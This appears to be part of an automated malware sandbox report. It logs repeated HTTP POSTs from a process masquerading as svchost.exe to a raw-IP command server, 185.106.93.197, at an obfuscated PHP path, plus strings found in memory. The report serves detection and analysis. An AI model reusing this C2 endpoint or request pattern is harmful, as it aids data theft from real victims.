Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.93.197
Source: unknown HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.106.93.197
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/Pro
Source: svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.106H
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
